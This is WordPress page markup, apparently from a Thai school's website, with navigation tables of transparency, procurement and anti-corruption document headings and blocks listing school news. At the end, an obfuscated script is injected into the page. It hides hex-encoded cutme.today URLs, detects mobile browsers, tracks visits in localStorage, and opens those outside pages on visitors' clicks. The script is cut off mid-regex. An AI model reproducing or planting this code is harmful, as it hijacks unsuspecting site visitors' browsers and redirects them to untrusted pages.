--></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 